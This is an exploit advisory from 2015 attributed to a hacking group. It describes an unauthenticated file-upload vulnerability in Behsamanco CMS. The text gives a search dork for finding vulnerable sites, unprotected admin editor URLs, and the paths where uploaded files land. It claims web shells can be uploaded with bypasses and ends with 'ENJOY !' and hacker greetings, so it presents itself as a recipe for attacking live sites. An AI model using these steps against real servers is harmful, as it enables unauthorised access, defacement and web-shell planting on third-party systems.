facebook facebook twitter rss

Behsamanco Cms File Upload Vulnerability

Author: Iran Cyber Security Group , Published: 01-04-2015
# Exploit Title : Behsamanco Cms File Upload Vulnerability
# Date : 09/03/2015
# Exploit Author : Iran Cyber Security Group
# Contact : whit3_w01f@att.net
# Category : Web Application Bugs
# Dork : inurl:Repositary/RadEditor/SentDoc/Guest/
# Tested On : Windows
# Home : Iran-Cyber.Org

1. Description

This vulenarabity allows you to upload file with these formats : .swf,.mp3,.mp4,.jpg,.gif,.jpeg,.txt,.docx,.doc but you can upload shells with bypasses.

2. Proof of Concept

1. Upload .txt File

After you searched the dork and found target use this exploit for upload .txt file :

site.com/Pages/Admin/CKEditor/DocumentManager.aspx

Now you can create a folder or delete a folder and upload .txt file or .docx or .doc files or delete them

Uploaded file url : site.com/Repositary/RadEditor/SentDoc/Guest/foldername/filename.txt

foldername is the name of the folder that you have uploaded file into that And filename is the name of the file that you have been uploaded.

If you didn't put it in a folder this is uploaded file url :

site.com/Repositary/RadEditor/SentDoc/Guest/filename.txt

2. Upload Image

After you searched the dork and found target use this exploit for upload image :

site.com/Pages/Admin/CKEditor/FlashManager.aspx

Now you can create a folder or delete a folder and upload images or delete them

Uploaded file url : site.com/Repositary/RadEditor/SentImages/Guest/foldername/filename.jpg

foldername is the name of the folder that you have uploaded file into that And filename is the name of the file that you have been uploaded.

If you didn't put it in a folder this is uploaded file url :

site.com/Repositary/RadEditor/SentImages/Guest/filename.jpg

3. Upload Flash Files

After you searched the dork and found target use this exploit for upload flash (.swf files) :

site.com/Pages/Admin/CKEditor/FlashManager.aspx

Now you can create a folder or delete a folder and upload .swf files or delete them

Uploaded file url : site.com/Repositary/RadEditor/SentFlashes/Guest/foldername/filename.swf

foldername is the name of the folder that you have uploaded file into that And filename is the name of the file that you have been uploaded.

If you didn't put it in a folder this is uploaded file url :

site.com/Repositary/RadEditor/SentFlashes/Guest/filename.swf

4. Upload Media

After you searched the dork and found target use this exploit for upload media (.mp3 & .mp4 files) :

site.com/Pages/Admin/CKEditor/MediaManager.aspx

Now you can create a folder or delete a folder and upload .mp3 & .mp4 files or delete them

Uploaded file url : site.com/Repositary/RadEditor/SentMedia/Guest/foldername/filename.mp3 or filename.mp4

foldername is the name of the folder that you have uploaded file into that And filename is the name of the file that you have been uploaded.

If you didn't put it in a folder this is uploaded file url :

site.com/Repositary/RadEditor/SentMedia/Guest/filename.mp3 or filename.mp4

ENJOY !
=====================
Greetz : root3r | Sheytan Azzam | Mohamad-Nofozi | KamraN HellisH | CRY$I$ | Jok3r | Alireza_ProMis | Pi.Hack |xX-AlibalA-Xx | Erfan Mig | Siyahi |

Like us on Facebook :